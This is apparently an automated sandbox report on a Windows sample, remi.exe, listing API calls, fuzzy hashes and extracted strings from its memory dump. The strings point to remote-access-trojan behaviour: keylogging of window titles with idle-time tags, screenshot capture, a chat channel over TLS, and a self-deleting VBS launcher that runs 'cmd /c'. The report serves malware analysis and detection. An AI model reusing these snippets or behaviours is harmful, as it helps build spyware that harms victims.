                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                                                                                                                                • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                                                                                                                                                                                                • API String ID: 3795512280-3163867910
                                                                                                                                                                                                                                                                                                • Opcode ID: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                                                                                                                                                                                                                                                                • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004500A6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004500C8
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004500DD
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004500E8
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0045010A
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0045011D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0045012B
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00450136
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0045016E
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00450175
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00450192
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004501AA
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                                • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                                                                                                                                • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                                                                                                                                                                                                                • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                                                                                                                                                • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                                                                                                                                                • API String ID: 489098229-65789007
                                                                                                                                                                                                                                                                                                • Opcode ID: 91d1b4f4dea65f3b826fcaa200c07d0103cb4320fd1aa60c718ca5279f5f8068
                                                                                                                                                                                                                                                                                                • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91d1b4f4dea65f3b826fcaa200c07d0103cb4320fd1aa60c718ca5279f5f8068
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                                                                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                                                                                                                                                                                                • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                                                                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                                                                                                                                • API String ID: 994465650-2151626615
                                                                                                                                                                                                                                                                                                • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                                                                                                                                                                                                                                                • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                                                                                                                                • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                                                                                                                                                • API String ID: 1913171305-390638927
                                                                                                                                                                                                                                                                                                • Opcode ID: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                                                                                                                                                                                                                                                                • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                                                                                                                                • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                                                                                                                                                                                                                                                                • closesocket.WS2_32(?), ref: 0040481F
                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404885
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040488A
                                                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040489A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3658366068-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                                                                                                                                                                                                                                                                • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00454A96
                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                                                                                                                                                                                                                • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00454C58
                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                                                                                                • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                                • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                                                                                                                                                                                                                • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                                                                                                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                                                                                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                                                                                                                                                • API String ID: 911427763-3954389425
                                                                                                                                                                                                                                                                                                • Opcode ID: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                                                                                                                                                                                                                                                                • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 65535$udp
                                                                                                                                                                                                                                                                                                • API String ID: 0-1267037602
                                                                                                                                                                                                                                                                                                • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                                                                                                                                                                                                • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043946A
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00439471
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2441525078-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8e17339ee731380b0b3a8ef5924022403d85b839411af4cfbf9d52c7b12deab7
                                                                                                                                                                                                                                                                                                • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e17339ee731380b0b3a8ef5924022403d85b839411af4cfbf9d52c7b12deab7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                                                                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                                                                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                                                                                                                                • API String ID: 2956720200-749203953
                                                                                                                                                                                                                                                                                                • Opcode ID: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                                                                                                                                                                                                                                                                • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                                                                                                                                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                                                                                                                                                                                • String ID: <$@$@FG$@FG$Temp
                                                                                                                                                                                                                                                                                                • API String ID: 1107811701-2245803885
                                                                                                                                                                                                                                                                                                • Opcode ID: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                                                                                                                                                                                                                                                                • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 248dd396e914dd493217af7d7ad54a5765675a85d7a0f101f9c1831ea090813b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\remi.exe), ref: 00406705
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
